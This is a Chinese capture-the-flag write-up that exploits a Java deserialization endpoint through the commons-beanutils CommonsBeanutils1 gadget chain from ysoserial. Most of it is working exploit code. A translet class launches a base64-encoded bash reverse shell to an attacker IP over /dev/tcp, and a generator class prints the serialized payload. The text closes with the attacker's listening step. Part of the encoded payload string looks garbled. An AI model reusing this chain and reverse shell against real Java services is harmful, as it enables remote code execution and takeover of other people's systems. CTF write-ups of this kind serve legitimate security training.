一、题目
二、解答
1、通过jar包,可以看到/user路由下有反序列化操作
看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。
使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;
ysoserial项目地址:https://github.com/frohoff/ysoserial
编辑Evil类内容如下:
package ysoserial.poc;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class MyExec extends AbstractTranslet {@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}static {try {Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4x5MDAxIDA+JjE=}|{base64,-d}|{bash,-i}");} catch (IOException e) {e.printStackTrace();}}
}
自定义命令如下:
Runtime.getRuntime().exec("bash -c {echo,反弹shell的payload Base64编码}|{base64,-d}|{bash,-i}");
Payload生成类如下:
package ysoserial.poc;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;
import ysoserial.payloads.util.Reflections;
public class PoC {
public static void main(String[] args) throws Exception {
TemplatesImpl templates = getTemplate();
// mock method name until armedfinal BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
// create queue with numbers and basic comparatorfinal PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);// stub data for replacement laterqueue.add("1");queue.add("1");
// switch method called by comparatorReflections.setFieldValue(comparator, "property", "outputProperties");
// switch contents of queuefinal Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");queueArray[0] = templates;queueArray[1] = templates;
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);objectOutputStream.writeObject(queue);byte[] bytes = byteArrayOutputStream.toByteArray();System.out.println(Base64.getEncoder().encodeToString(bytes));
// ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
// ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
// objectInputStream.readObject();}public static TemplatesImpl getTemplate() throws Exception {ClassPool classPool = ClassPool.getDefault();CtClass clz = classPool.get(MyExec.class.getName());TemplatesImpl obj = new TemplatesImpl();Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());return obj;}
}
3、漏洞利用
攻击机监听端口:
![[NSSCTF Round#16 Basic]RCE但是没有完全RCE](https://img-blog.csdnimg.cn/direct/1b58857d0f8541bd83da05270d865941.png)
